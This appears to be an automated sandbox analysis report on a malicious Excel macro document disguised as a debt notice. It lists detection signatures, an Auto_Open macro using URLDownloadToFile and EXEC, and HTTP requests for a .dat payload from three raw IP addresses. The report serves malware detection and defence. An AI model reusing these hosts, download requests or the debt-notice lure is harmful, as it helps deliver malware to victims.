Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-439798376-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-439798376-05042021.xlsm
Analysis ID:404106
MD5:4131b71c0f1d082edb34c766188d10b1
SHA1:4d6afffcd7ba91815cc9d8e0427123aa63bd93a8
SHA256:c985fb8f434d7ed9d9844c8770e6c1b1d00d49de4dd6fcc4a8c4fc77be3080f7
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5816 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Source: excel.exeMemory has grown: Private usage: 1MB later: 83MB
Source: global trafficTCP traffic: 192.168.2.5:49710 -> 91.211.91.81:80
Source: global trafficTCP traffic: 192.168.2.5:49710 -> 91.211.91.81:80
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.153.229.23Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.153.229.23Connection: Keep-Alive
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.aadrm.com/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.cortana.ai
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.office.net
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.onedrive.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://augloop.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://augloop.office.com/v2
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://cdn.entity.
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://clients.config.office.net/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://config.edge.skype.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://cortana.ai
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://cortana.ai/api
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://cr.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://dev.cortana.ai
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://devnull.onenote.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://directory.services.
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://graph.windows.net
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://graph.windows.net/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://lifecycle.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://login.windows.local
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://management.azure.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://management.azure.com/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://messaging.office.com/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://ncus.contentsync.
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://officeapps.live.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://onedrive.live.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://outlook.office.com/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://outlook.office365.com/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://powerlift.acompli.net
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://settings.outlook.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://staging.cortana.ai
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://tasks.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://webshell.suite.office.com
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://wus2.contentsync.
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: D3813350-B159-4E3E-AD21-A99C8C4A3C67.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-439798376-05042021.xlsmInitial sample: urlmon
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-439798376-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-439798376-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open
Source: Outstanding-Debt-439798376-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal60.expl.evad.winXLSM@1/10@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E96F8753-C1E7-44B6-9B81-7B33F9D63FBF} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-439798376-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-439798376-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-439798376-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-439798376-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-439798376-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
